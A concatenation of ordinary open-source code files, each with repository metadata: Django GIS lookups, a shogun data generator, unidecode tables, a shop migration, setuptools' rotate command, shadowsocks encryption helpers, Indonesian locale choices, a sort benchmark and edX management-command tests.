data, lookup_type, params_or_value, lvalue.field, qn)
return spatial_sql, spatial_params + params
else:
return super(GeoWhereNode, self).make_atom(child, qn, connection)
@classmethod
def _check_geo_field(cls, opts, lookup):
"""
Utility for checking the given lookup with the given model options.
The lookup is a string either specifying the geographic field, e.g.
'point' or 'the_geom', or a related lookup on a geographic field like
'address__point'.
If a GeometryField exists according to the given lookup on the model
options, it will be returned. Otherwise returns None.
"""
# This takes into account the situation where the lookup is a
# lookup to a related geographic field, e.g., 'address__point'.
field_list = lookup.split(LOOKUP_SEP)
# Reversing so list operates like a queue of related lookups,
# and popping the top lookup.
field_list.reverse()
fld_name = field_list.pop()
try:
geo_fld = opts.get_field(fld_name)
# If the field list is still around, then it means that the
# lookup was for a geometry field across a relationship --
# thus we keep on getting the related model options and the
# model field associated with the next field in the list
# until there's no more left.
while len(field_list):
opts = geo_fld.rel.to._meta
geo_fld = opts.get_field(field_list.pop())
except (FieldDoesNotExist, AttributeError):
return False
# Finally, make sure we got a Geographic field and return.
if isinstance(geo_fld, GeometryField):
return geo_fld
else:
return False
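# Illustrative lookups for _check_geo_field (the models are hypothetical:
# assume `City` has `point = PointField()` and `Person` has a related
# `address` model that also carries a PointField):
#
#     GeoWhereNode._check_geo_field(City._meta, 'point')            # GeometryField
#     GeoWhereNode._check_geo_field(Person._meta, 'address__point') # GeometryField
#     GeoWhereNode._check_geo_field(City._meta, 'name')             # False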
|
curiousguy13/shogun
|
refs/heads/develop
|
examples/undocumented/python_modular/tools/generate_circle_data.py
|
36
|
from numpy import *
import numpy as np
import sys
import math as m
class circle_data:
def __init__(self):
pass
def generate_data(self,number_of_points_for_circle1,number_of_points_for_circle2,row_vector):
"""
generate_circle_data generates a dataset in the shape of 2 circles. In this particular example we have taken the radii of
the 2 circles to be 10 and 30.
'number_of_points_for_circle1' and 'number_of_points_for_circle2' define the number of y
coordinates for each circle.
'row_vector': decides the dimension of the input data. In this particular example it is taken as 2
'circle1':the first circle
'circle2':the second circle
'xmin_circle1':the minimum value of the x coordinate for first circle
'xmax_circle1':the maximum value of the x coordinate for first circle
'xmin_circle2':the minimum value of the x coordinate for second circle
'xmax_circle2':the maximum value of the x coordinate for second circle
'xrange_circle1': the horizontal range of the x coordinates of the first circle
'xrange_circle2': the horizontal range of the x coordinates of the second circle
'radius1':the radius of the first circle
'radius2':the radius of the second circle
'two_circles':the concatenated data of the 2 circles
"""
#number_of_points_for_circle1=42
#number_of_points_for_circle2=122
row_vector=2
circle1=zeros((row_vector,number_of_points_for_circle1))
circle2=zeros((row_vector,number_of_points_for_circle2))
radius1=(number_of_points_for_circle1-2)/4
radius2=(number_of_points_for_circle2-2)/4
l2=len(circle2[0])
l1=len(circle1[0])
xmin_circle1=-1*radius1
xmax_circle1=radius1
xmin_circle2=-1*radius2
xmax_circle2=radius2
xrange_circle1=range(xmin_circle1,xmax_circle1+1)
xrange_circle1=xrange_circle1+xrange_circle1
xrange_circle2=range(xmin_circle2,xmax_circle2+1)
xrange_circle2=xrange_circle2+xrange_circle2
circle1[0][:]=xrange_circle1
circle2[0][:]=xrange_circle2
mat1=radius1*radius1*ones((1,number_of_points_for_circle1))
mat2=radius2*radius2*ones((1,number_of_points_for_circle2))
circle1[1][:]=mat1-(circle1[0][:]*circle1[0][:])
circle2[1][:]=mat2-(circle2[0][:]*circle2[0][:])
circle1[1][:]=[m.sqrt(circle1[1][i]) for i in range(0,number_of_points_for_circle1)]
circle1[1][(number_of_points_for_circle1/2):]=-1*circle1[1][(number_of_points_for_circle1/2):]
circle2[1][:]=[m.sqrt(circle2[1][i]) for i in range(0,number_of_points_for_circle2)]
circle2[1][(number_of_points_for_circle2/2):]=-1*circle2[1][(number_of_points_for_circle2/2):]
two_circles=hstack((circle1,circle2))
return two_circles
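# Worked example (illustrative): with 42 and 122 points the radii come out as
# (42 - 2) / 4 = 10 and (122 - 2) / 4 = 30, matching the docstring above.
#
#     gen = circle_data()
#     two_circles = gen.generate_data(42, 122, 2)   # shape (2, 164)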
|
WillisXChen/django-oscar
|
refs/heads/master
|
oscar/lib/python2.7/site-packages/unidecode/x077.py
|
252
|
data = (
'Ming ', # 0x00
'Sheng ', # 0x01
'Shi ', # 0x02
'Yun ', # 0x03
'Mian ', # 0x04
'Pan ', # 0x05
'Fang ', # 0x06
'Miao ', # 0x07
'Dan ', # 0x08
'Mei ', # 0x09
'Mao ', # 0x0a
'Kan ', # 0x0b
'Xian ', # 0x0c
'Ou ', # 0x0d
'Shi ', # 0x0e
'Yang ', # 0x0f
'Zheng ', # 0x10
'Yao ', # 0x11
'Shen ', # 0x12
'Huo ', # 0x13
'Da ', # 0x14
'Zhen ', # 0x15
'Kuang ', # 0x16
'Ju ', # 0x17
'Shen ', # 0x18
'Chi ', # 0x19
'Sheng ', # 0x1a
'Mei ', # 0x1b
'Mo ', # 0x1c
'Zhu ', # 0x1d
'Zhen ', # 0x1e
'Zhen ', # 0x1f
'Mian ', # 0x20
'Di ', # 0x21
'Yuan ', # 0x22
'Die ', # 0x23
'Yi ', # 0x24
'Zi ', # 0x25
'Zi ', # 0x26
'Chao ', # 0x27
'Zha ', # 0x28
'Xuan ', # 0x29
'Bing ', # 0x2a
'Mi ', # 0x2b
'Long ', # 0x2c
'Sui ', # 0x2d
'Dong ', # 0x2e
'Mi ', # 0x2f
'Die ', # 0x30
'Yi ', # 0x31
'Er ', # 0x32
'Ming ', # 0x33
'Xuan ', # 0x34
'Chi ', # 0x35
'Kuang ', # 0x36
'Juan ', # 0x37
'Mou ', # 0x38
'Zhen ', # 0x39
'Tiao ', # 0x3a
'Yang ', # 0x3b
'Yan ', # 0x3c
'Mo ', # 0x3d
'Zhong ', # 0x3e
'Mai ', # 0x3f
'Zhao ', # 0x40
'Zheng ', # 0x41
'Mei ', # 0x42
'Jun ', # 0x43
'Shao ', # 0x44
'Han ', # 0x45
'Huan ', # 0x46
'Di ', # 0x47
'Cheng ', # 0x48
'Cuo ', # 0x49
'Juan ', # 0x4a
'E ', # 0x4b
'Wan ', # 0x4c
'Xian ', # 0x4d
'Xi ', # 0x4e
'Kun ', # 0x4f
'Lai ', # 0x50
'Jian ', # 0x51
'Shan ', # 0x52
'Tian ', # 0x53
'Hun ', # 0x54
'Wan ', # 0x55
'Ling ', # 0x56
'Shi ', # 0x57
'Qiong ', # 0x58
'Lie ', # 0x59
'Yai ', # 0x5a
'Jing ', # 0x5b
'Zheng ', # 0x5c
'Li ', # 0x5d
'Lai ', # 0x5e
'Sui ', # 0x5f
'Juan ', # 0x60
'Shui ', # 0x61
'Sui ', # 0x62
'Du ', # 0x63
'Bi ', # 0x64
'Bi ', # 0x65
'Mu ', # 0x66
'Hun ', # 0x67
'Ni ', # 0x68
'Lu ', # 0x69
'Yi ', # 0x6a
'Jie ', # 0x6b
'Cai ', # 0x6c
'Zhou ', # 0x6d
'Yu ', # 0x6e
'Hun ', # 0x6f
'Ma ', # 0x70
'Xia ', # 0x71
'Xing ', # 0x72
'Xi ', # 0x73
'Gun ', # 0x74
'Cai ', # 0x75
'Chun ', # 0x76
'Jian ', # 0x77
'Mei ', # 0x78
'Du ', # 0x79
'Hou ', # 0x7a
'Xuan ', # 0x7b
'Ti ', # 0x7c
'Kui ', # 0x7d
'Gao ', # 0x7e
'Rui ', # 0x7f
'Mou ', # 0x80
'Xu ', # 0x81
'Fa ', # 0x82
'Wen ', # 0x83
'Miao ', # 0x84
'Chou ', # 0x85
'Kui ', # 0x86
'Mi ', # 0x87
'Weng ', # 0x88
'Kou ', # 0x89
'Dang ', # 0x8a
'Chen ', # 0x8b
'Ke ', # 0x8c
'Sou ', # 0x8d
'Xia ', # 0x8e
'Qiong ', # 0x8f
'Mao ', # 0x90
'Ming ', # 0x91
'Man ', # 0x92
'Shui ', # 0x93
'Ze ', # 0x94
'Zhang ', # 0x95
'Yi ', # 0x96
'Diao ', # 0x97
'Ou ', # 0x98
'Mo ', # 0x99
'Shun ', # 0x9a
'Cong ', # 0x9b
'Lou ', # 0x9c
'Chi ', # 0x9d
'Man ', # 0x9e
'Piao ', # 0x9f
'Cheng ', # 0xa0
'Ji ', # 0xa1
'Meng ', # 0xa2
'[?] ', # 0xa3
'Run ', # 0xa4
'Pie ', # 0xa5
'Xi ', # 0xa6
'Qiao ', # 0xa7
'Pu ', # 0xa8
'Zhu ', # 0xa9
'Deng ', # 0xaa
'Shen ', # 0xab
'Shun ', # 0xac
'Liao ', # 0xad
'Che ', # 0xae
'Xian ', # 0xaf
'Kan ', # 0xb0
'Ye ', # 0xb1
'Xu ', # 0xb2
'Tong ', # 0xb3
'Mou ', # 0xb4
'Lin ', # 0xb5
'Kui ', # 0xb6
'Xian ', # 0xb7
'Ye ', # 0xb8
'Ai ', # 0xb9
'Hui ', # 0xba
'Zhan ', # 0xbb
'Jian ', # 0xbc
'Gu ', # 0xbd
'Zhao ', # 0xbe
'Qu ', # 0xbf
'Wei ', # 0xc0
'Chou ', # 0xc1
'Sao ', # 0xc2
'Ning ', # 0xc3
'Xun ', # 0xc4
'Yao ', # 0xc5
'Huo ', # 0xc6
'Meng ', # 0xc7
'Mian ', # 0xc8
'Bin ', # 0xc9
'Mian ', # 0xca
'Li ', # 0xcb
'Kuang ', # 0xcc
'Jue ', # 0xcd
'Xuan ', # 0xce
'Mian ', # 0xcf
'Huo ', # 0xd0
'Lu ', # 0xd1
'Meng ', # 0xd2
'Long ', # 0xd3
'Guan ', # 0xd4
'Man ', # 0xd5
'Xi ', # 0xd6
'Chu ', # 0xd7
'Tang ', # 0xd8
'Kan ', # 0xd9
'Zhu ', # 0xda
'Mao ', # 0xdb
'Jin ', # 0xdc
'Lin ', # 0xdd
'Yu ', # 0xde
'Shuo ', # 0xdf
'Ce ', # 0xe0
'Jue ', # 0xe1
'Shi ', # 0xe2
'Yi ', # 0xe3
'Shen ', # 0xe4
'Zhi ', # 0xe5
'Hou ', # 0xe6
'Shen ', # 0xe7
'Ying ', # 0xe8
'Ju ', # 0xe9
'Zhou ', # 0xea
'Jiao ', # 0xeb
'Cuo ', # 0xec
'Duan ', # 0xed
'Ai ', # 0xee
'Jiao ', # 0xef
'Zeng ', # 0xf0
'Huo ', # 0xf1
'Bai ', # 0xf2
'Shi ', # 0xf3
'Ding ', # 0xf4
'Qi ', # 0xf5
'Ji ', # 0xf6
'Zi ', # 0xf7
'Gan ', # 0xf8
'Wu ', # 0xf9
'Tuo ', # 0xfa
'Ku ', # 0xfb
'Qiang ', # 0xfc
'Xi ', # 0xfd
'Fan ', # 0xfe
'Kuang ', # 0xff
)
|
AlexStarov/Shop
|
refs/heads/master
|
applications/cart/migrations/0005_auto_20170107_2248.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cart', '0004_auto_20170102_2258'),
]
operations = [
migrations.AddField(
model_name='order',
name='custom_order_sum',
field=models.PositiveIntegerField(null=True, verbose_name='\u0421\u0443\u043c\u043c\u0430 \u0437\u0430\u043a\u0430\u0437\u0430 \u0432 \u0440\u0443\u0447\u043d\u0443\u044e', blank=True),
),
migrations.AddField(
model_name='product',
name='custom_price',
field=models.BooleanField(default=False, verbose_name='\u0426\u0435\u043d\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 \u0440\u0443\u0447\u043d\u0443\u044e'),
),
]
|
IRI-Research/django-templatetag-sugar
|
refs/heads/master
|
templatetag_sugar/__init__.py
|
17
|
__version__ = "1.0.1"
|
tkingless/webtesting
|
refs/heads/master
|
venvs/dev/lib/python2.7/site-packages/setuptools/command/rotate.py
|
389
|
from distutils.util import convert_path
from distutils import log
from distutils.errors import DistutilsOptionError
import os
import shutil
from setuptools.extern import six
from setuptools import Command
class rotate(Command):
"""Delete older distributions"""
description = "delete older distributions, keeping N newest files"
user_options = [
('match=', 'm', "patterns to match (required)"),
('dist-dir=', 'd', "directory where the distributions are"),
('keep=', 'k', "number of matching distributions to keep"),
]
boolean_options = []
def initialize_options(self):
self.match = None
self.dist_dir = None
self.keep = None
def finalize_options(self):
if self.match is None:
raise DistutilsOptionError(
"Must specify one or more (comma-separated) match patterns "
"(e.g. '.zip' or '.egg')"
)
if self.keep is None:
raise DistutilsOptionError("Must specify number of files to keep")
try:
self.keep = int(self.keep)
except ValueError:
raise DistutilsOptionError("--keep must be an integer")
if isinstance(self.match, six.string_types):
self.match = [
convert_path(p.strip()) for p in self.match.split(',')
]
self.set_undefined_options('bdist', ('dist_dir', 'dist_dir'))
def run(self):
self.run_command("egg_info")
from glob import glob
for pattern in self.match:
pattern = self.distribution.get_name() + '*' + pattern
files = glob(os.path.join(self.dist_dir, pattern))
files = [(os.path.getmtime(f), f) for f in files]
files.sort()
files.reverse()
log.info("%d file(s) matching %s", len(files), pattern)
files = files[self.keep:]
for (t, f) in files:
log.info("Deleting %s", f)
if not self.dry_run:
if os.path.isdir(f):
shutil.rmtree(f)
else:
os.unlink(f)
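# Typical invocation (illustrative): keep the two newest distributions
# matching '<name>*.egg' in the dist directory and delete the older ones:
#
#     python setup.py rotate --match=.egg --keep=2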
|
shliujing/shadowsocks
|
refs/heads/master
|
shadowsocks/encrypt.py
|
4
|
#!/usr/bin/env python
# Copyright (c) 2014 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import hashlib
import logging
from shadowsocks.crypto import m2, rc4_md5, salsa20_ctr,\
ctypes_openssl, ctypes_libsodium, table
method_supported = {}
method_supported.update(rc4_md5.ciphers)
method_supported.update(salsa20_ctr.ciphers)
method_supported.update(ctypes_openssl.ciphers)
method_supported.update(ctypes_libsodium.ciphers)
# let M2Crypto override ctypes_openssl
method_supported.update(m2.ciphers)
method_supported.update(table.ciphers)
def random_string(length):
try:
import M2Crypto.Rand
return M2Crypto.Rand.rand_bytes(length)
except ImportError:
return os.urandom(length)
cached_keys = {}
def try_cipher(key, method=None):
Encryptor(key, method)
def EVP_BytesToKey(password, key_len, iv_len):
# equivalent to OpenSSL's EVP_BytesToKey() with count 1
# so that we make the same key and iv as the node.js version
if hasattr(password, 'encode'):
password = password.encode('utf-8')
cached_key = '%s-%d-%d' % (password, key_len, iv_len)
r = cached_keys.get(cached_key, None)
if r:
return r
m = []
i = 0
while len(b''.join(m)) < (key_len + iv_len):
md5 = hashlib.md5()
data = password
if i > 0:
data = m[i - 1] + password
md5.update(data)
m.append(md5.digest())
i += 1
ms = b''.join(m)
key = ms[:key_len]
iv = ms[key_len:key_len + iv_len]
cached_keys[cached_key] = (key, iv)
return key, iv
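# Worked sketch of the derivation above (values illustrative): for
# 'aes-256-cfb' (key_len=32, iv_len=16), m[0] = MD5(password),
# m[1] = MD5(m[0] + password), ... until at least 48 bytes are available
# (three 16-byte MD5 digests); the first 32 bytes become the key and the
# next 16 the IV:
#
#     key, iv = EVP_BytesToKey(b'password', 32, 16)
#     assert len(key) == 32 and len(iv) == 16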
class Encryptor(object):
def __init__(self, key, method):
self.key = key
self.method = method
self.iv = None
self.iv_sent = False
self.cipher_iv = b''
self.decipher = None
method = method.lower()
self._method_info = self.get_method_info(method)
if self._method_info:
self.cipher = self.get_cipher(key, method, 1,
random_string(self._method_info[1]))
else:
logging.error('method %s not supported' % method)
sys.exit(1)
def get_method_info(self, method):
method = method.lower()
m = method_supported.get(method)
return m
def iv_len(self):
return len(self.cipher_iv)
def get_cipher(self, password, method, op, iv):
if hasattr(password, 'encode'):
password = password.encode('utf-8')
m = self._method_info
if m[0] > 0:
key, iv_ = EVP_BytesToKey(password, m[0], m[1])
else:
# key_length == 0 indicates we should use the key directly
key, iv = password, b''
iv = iv[:m[1]]
if op == 1:
# this iv is for cipher not decipher
self.cipher_iv = iv[:m[1]]
return m[2](method, key, iv, op)
def encrypt(self, buf):
if len(buf) == 0:
return buf
if self.iv_sent:
return self.cipher.update(buf)
else:
self.iv_sent = True
return self.cipher_iv + self.cipher.update(buf)
def decrypt(self, buf):
if len(buf) == 0:
return buf
if self.decipher is None:
decipher_iv_len = self._method_info[1]
decipher_iv = buf[:decipher_iv_len]
self.decipher = self.get_cipher(self.key, self.method, 0,
iv=decipher_iv)
buf = buf[decipher_iv_len:]
if len(buf) == 0:
return buf
return self.decipher.update(buf)
def encrypt_all(password, method, op, data):
result = []
method = method.lower()
(key_len, iv_len, m) = method_supported[method]
if key_len > 0:
key, _ = EVP_BytesToKey(password, key_len, iv_len)
else:
key = password
if op:
iv = random_string(iv_len)
result.append(iv)
else:
iv = data[:iv_len]
data = data[iv_len:]
cipher = m(method, key, iv, op)
result.append(cipher.update(data))
return b''.join(result)
CIPHERS_TO_TEST = [
b'aes-128-cfb',
b'aes-256-cfb',
b'rc4-md5',
b'salsa20',
b'chacha20',
b'table',
]
def test_encryptor():
from os import urandom
plain = urandom(10240)
for method in CIPHERS_TO_TEST:
logging.warn(method)
encryptor = Encryptor(b'key', method)
decryptor = Encryptor(b'key', method)
cipher = encryptor.encrypt(plain)
plain2 = decryptor.decrypt(cipher)
assert plain == plain2
def test_encrypt_all():
from os import urandom
plain = urandom(10240)
for method in CIPHERS_TO_TEST:
logging.warn(method)
cipher = encrypt_all(b'key', method, 1, plain)
plain2 = encrypt_all(b'key', method, 0, cipher)
assert plain == plain2
if __name__ == '__main__':
test_encrypt_all()
test_encryptor()
|
2013Commons/HUE-SHARK
|
refs/heads/master
|
desktop/core/ext-py/Django-1.2.3/build/lib.linux-i686-2.7/django/contrib/localflavor/id/id_choices.py
|
65
|
from django.utils.translation import ugettext_lazy as _
# Reference: http://id.wikipedia.org/wiki/Daftar_provinsi_Indonesia
# Indonesia does not have an official Province code standard.
# I decided to use unambiguous and consistent (some are common) 3-letter codes.
PROVINCE_CHOICES = (
('BLI', _('Bali')),
('BTN', _('Banten')),
('BKL', _('Bengkulu')),
('DIY', _('Yogyakarta')),
('JKT', _('Jakarta')),
('GOR', _('Gorontalo')),
('JMB', _('Jambi')),
('JBR', _('Jawa Barat')),
('JTG', _('Jawa Tengah')),
('JTM', _('Jawa Timur')),
('KBR', _('Kalimantan Barat')),
('KSL', _('Kalimantan Selatan')),
('KTG', _('Kalimantan Tengah')),
('KTM', _('Kalimantan Timur')),
('BBL', _('Kepulauan Bangka-Belitung')),
('KRI', _('Kepulauan Riau')),
('LPG', _('Lampung')),
('MLK', _('Maluku')),
('MUT', _('Maluku Utara')),
('NAD', _('Nanggroe Aceh Darussalam')),
('NTB', _('Nusa Tenggara Barat')),
('NTT', _('Nusa Tenggara Timur')),
('PPA', _('Papua')),
('PPB', _('Papua Barat')),
('RIU', _('Riau')),
('SLB', _('Sulawesi Barat')),
('SLS', _('Sulawesi Selatan')),
('SLT', _('Sulawesi Tengah')),
('SLR', _('Sulawesi Tenggara')),
('SLU', _('Sulawesi Utara')),
('SMB', _('Sumatera Barat')),
('SMS', _('Sumatera Selatan')),
('SMU', _('Sumatera Utara')),
)
LICENSE_PLATE_PREFIX_CHOICES = (
('A', _('Banten')),
('AA', _('Magelang')),
('AB', _('Yogyakarta')),
('AD', _('Surakarta - Solo')),
('AE', _('Madiun')),
('AG', _('Kediri')),
('B', _('Jakarta')),
('BA', _('Sumatera Barat')),
('BB', _('Tapanuli')),
('BD', _('Bengkulu')),
('BE', _('Lampung')),
('BG', _('Sumatera Selatan')),
('BH', _('Jambi')),
('BK', _('Sumatera Utara')),
('BL', _('Nanggroe Aceh Darussalam')),
('BM', _('Riau')),
('BN', _('Kepulauan Bangka Belitung')),
('BP', _('Kepulauan Riau')),
('CC', _('Corps Consulate')),
('CD', _('Corps Diplomatic')),
('D', _('Bandung')),
('DA', _('Kalimantan Selatan')),
('DB', _('Sulawesi Utara Daratan')),
('DC', _('Sulawesi Barat')),
('DD', _('Sulawesi Selatan')),
('DE', _('Maluku')),
('DG', _('Maluku Utara')),
('DH', _('NTT - Timor')),
('DK', _('Bali')),
('DL', _('Sulawesi Utara Kepulauan')),
('DM', _('Gorontalo')),
('DN', _('Sulawesi Tengah')),
('DR', _('NTB - Lombok')),
('DS', _('Papua dan Papua Barat')),
('DT', _('Sulawesi Tenggara')),
('E', _('Cirebon')),
('EA', _('NTB - Sumbawa')),
('EB', _('NTT - Flores')),
('ED', _('NTT - Sumba')),
('F', _('Bogor')),
('G', _('Pekalongan')),
('H', _('Semarang')),
('K', _('Pati')),
('KB', _('Kalimantan Barat')),
('KH', _('Kalimantan Tengah')),
('KT', _('Kalimantan Timur')),
('L', _('Surabaya')),
('M', _('Madura')),
('N', _('Malang')),
('P', _('Jember')),
('R', _('Banyumas')),
('RI', _('Federal Government')),
('S', _('Bojonegoro')),
('T', _('Purwakarta')),
('W', _('Sidoarjo')),
('Z', _('Garut')),
)
|
beiko-lab/gengis
|
refs/heads/master
|
bin/Lib/test/sortperf.py
|
14
|
"""Sort performance test.
See main() for command line syntax.
See tabulate() for output format.
"""
import sys
import time
import random
import marshal
import tempfile
import os
td = tempfile.gettempdir()
def randfloats(n):
"""Return a list of n random floats in [0, 1)."""
# Generating floats is expensive, so this writes them out to a file in
# a temp directory. If the file already exists, it just reads them
# back in and shuffles them a bit.
fn = os.path.join(td, "rr%06d" % n)
try:
fp = open(fn, "rb")
except IOError:
r = random.random
result = [r() for i in xrange(n)]
try:
try:
fp = open(fn, "wb")
marshal.dump(result, fp)
fp.close()
fp = None
finally:
if fp:
try:
os.unlink(fn)
except os.error:
pass
except IOError, msg:
print "can't write", fn, ":", msg
else:
result = marshal.load(fp)
fp.close()
# Shuffle it a bit...
for i in range(10):
i = random.randrange(n)
temp = result[:i]
del result[:i]
temp.reverse()
result.extend(temp)
del temp
assert len(result) == n
return result
def flush():
sys.stdout.flush()
def doit(L):
t0 = time.clock()
L.sort()
t1 = time.clock()
print "%6.2f" % (t1-t0),
flush()
def tabulate(r):
"""Tabulate sort speed for lists of various sizes.
The sizes are 2**i for i in r (the argument, a list).
The output displays i, 2**i, and the time to sort arrays of 2**i
floating point numbers with the following properties:
*sort: random data
\sort: descending data
/sort: ascending data
3sort: ascending, then 3 random exchanges
+sort: ascending, then 10 random at the end
%sort: ascending, then randomly replace 1% of the elements w/ random values
~sort: many duplicates
=sort: all equal
!sort: worst case scenario
"""
cases = tuple([ch + "sort" for ch in r"*\/3+%~=!"])
fmt = ("%2s %7s" + " %6s"*len(cases))
print fmt % (("i", "2**i") + cases)
for i in r:
n = 1 << i
L = randfloats(n)
print "%2d %7d" % (i, n),
flush()
doit(L) # *sort
L.reverse()
doit(L) # \sort
doit(L) # /sort
# Do 3 random exchanges.
for dummy in range(3):
i1 = random.randrange(n)
i2 = random.randrange(n)
L[i1], L[i2] = L[i2], L[i1]
doit(L) # 3sort
# Replace the last 10 with random floats.
if n >= 10:
L[-10:] = [random.random() for dummy in range(10)]
doit(L) # +sort
# Replace 1% of the elements at random.
for dummy in xrange(n // 100):
L[random.randrange(n)] = random.random()
doit(L) # %sort
# Arrange for lots of duplicates.
if n > 4:
del L[4:]
L = L * (n // 4)
# Force the elements to be distinct objects, else timings can be
# artificially low.
L = map(lambda x: --x, L)
doit(L) # ~sort
del L
# All equal. Again, force the elements to be distinct objects.
L = map(abs, [-0.5] * n)
doit(L) # =sort
del L
# This one looks like [3, 2, 1, 0, 0, 1, 2, 3]. It was a bad case
# for an older implementation of quicksort, which used the median
# of the first, last and middle elements as the pivot.
half = n // 2
L = range(half - 1, -1, -1)
L.extend(range(half))
# Force to float, so that the timings are comparable. This is
# significantly faster if we leave them as ints.
L = map(float, L)
doit(L) # !sort
print
def main():
"""Main program when invoked as a script.
One argument: tabulate a single row.
Two arguments: tabulate a range (inclusive).
Extra arguments are used to seed the random generator.
"""
# default range (inclusive)
k1 = 15
k2 = 20
if sys.argv[1:]:
# one argument: single point
k1 = k2 = int(sys.argv[1])
if sys.argv[2:]:
# two arguments: specify range
k2 = int(sys.argv[2])
if sys.argv[3:]:
# derive random seed from remaining arguments
x = 1
for a in sys.argv[3:]:
x = 69069 * x + hash(a)
random.seed(x)
r = range(k1, k2+1) # include the end point
tabulate(r)
if __name__ == '__main__':
main()
|
pabloborrego93/edx-platform
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/tests/test_delete_orphans.py
|
86
|
"""Tests running the delete_orphan command"""
import ddt
from django.core.management import call_command, CommandError
from contentstore.tests.test_orphan import TestOrphanBase
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore import ModuleStoreEnum
@ddt.ddt
class TestDeleteOrphan(TestOrphanBase):
"""
Tests for running the delete_orphan management command.
Inherits from TestOrphanBase in order to use its setUp method.
"""
def test_no_args(self):
"""
Test delete_orphans command with no arguments
"""
with self.assertRaisesRegexp(CommandError, 'Error: too few arguments'):
call_command('delete_orphans')
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_delete_orphans_no_commit(self, default_store):
"""
Tests that running the command without a '--commit' argument
results in no orphans being deleted
"""
course = self.create_course_with_orphans(default_store)
call_command('delete_orphans', unicode(course.id))
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'multi_parent_html')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('vertical', 'OrphanVert')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('chapter', 'OrphanChapter')))
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'OrphanHtml')))
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_delete_orphans_commit(self, default_store):
"""
Tests that running the command WITH the '--commit' argument
results in the orphans being deleted
"""
course = self.create_course_with_orphans(default_store)
call_command('delete_orphans', unicode(course.id), '--commit')
# make sure this module wasn't deleted
self.assertTrue(self.store.has_item(course.id.make_usage_key('html', 'multi_parent_html')))
# and make sure that these were
self.assertFalse(self.store.has_item(course.id.make_usage_key('vertical', 'OrphanVert')))
self.assertFalse(self.store.has_item(course.id.make_usage_key('chapter', 'OrphanChapter')))
self.assertFalse(self.store.has_item(course.id.make_usage_key('html', 'OrphanHtml')))
def test_delete_orphans_published_branch_split(self):
"""
Tests that if there are orphans only on the published branch,
running delete orphans with a course key that specifies
the published branch will delete the published orphan
"""
course, orphan = self.create_split_course_with_published_orphan()
published_branch = course.id.for_branch(ModuleStoreEnum.BranchName.published)
items_in_published = self.store.get_items(published_branch)
items_in_draft_preferred = self.store.get_items(course.id)
# call delete orphans, specifying the published branch
# of the course
call_command('delete_orphans', unicode(published_branch), '--commit')
# now all orphans should be deleted
self.assertOrphanCount(course.id, 0)
self.assertOrphanCount(published_branch, 0)
self.assertNotIn(orphan, self.store.get_items(published_branch))
# we should have one fewer item in the published branch of the course
self.assertEqual(
len(items_in_published) - 1,
len(self.store.get_items(published_branch)),
)
# and the same amount of items in the draft branch of the course
self.assertEqual(
len(items_in_draft_preferred),
len(self.store.get_items(course.id)),
)
def create_split_course_with_published_orphan(self):
"""
Helper to create a split course with a published orphan
"""
course = CourseFactory.create(default_store=ModuleStoreEnum.Type.split)
# create an orphan
orphan = self.store.create_item(
self.user.id, course.id, 'html', "PublishedOnlyOrphan"
)
self.store.publish(orphan.location, self.user.id)
# grab the published branch of the course
published_branch = course.id.for_branch(
ModuleStoreEnum.BranchName.published
)
# assert that this orphan is present in both branches
self.assertOrphanCount(course.id, 1)
self.assertOrphanCount(published_branch, 1)
# delete this orphan from the draft branch without
# auto-publishing this change to the published branch
self.store.delete_item(
orphan.location, self.user.id, skip_auto_publish=True
)
# now there should be no orphans in the draft branch, but
# there should be one in published
self.assertOrphanCount(course.id, 0)
self.assertOrphanCount(published_branch, 1)
self.assertIn(orphan, self.store.get_items(published_branch))
return course, orphan
|
justinpotts/mozillians
|
refs/heads/master
|
vendor-local/lib/python/unidecode/x024.py
|
118
|
data = (
'', # 0x00
'', # 0x01
'', # 0x02
'', # 0x03
'', # 0x04
'', # 0x05
'', # 0x06
'', # 0x07
'', # 0x08
'', # 0x09
'', # 0x0a
'', # 0x0b
'', # 0x0c
'', # 0x0d
'', # 0x0e
'', # 0x0f
'', # 0x10
'', # 0x11
'', # 0x12
'', # 0x13
'', # 0x14
'', # 0x15
'', # 0x16
'', # 0x17
'', # 0x18
'', # 0x19
'', # 0x1a
'', # 0x1b
'', # 0x1c
'', # 0x1d
'', # 0x1e
'', # 0x1f
'', # 0x20
'', # 0x21
'', # 0x22
'', # 0x23
'', # 0x24
'', # 0x25
'', # 0x26
'[?]', # 0x27
'[?]', # 0x28
'[?]', # 0x29
'[?]', # 0x2a
'[?]', # 0x2b
'[?]', # 0x2c
'[?]', # 0x2d
'[?]', # 0x2e
'[?]', # 0x2f
'[?]', # 0x30
'[?]', # 0x31
'[?]', # 0x32
'[?]', # 0x33
'[?]', # 0x34
'[?]', # 0x35
'[?]', # 0x36
'[?]', # 0x37
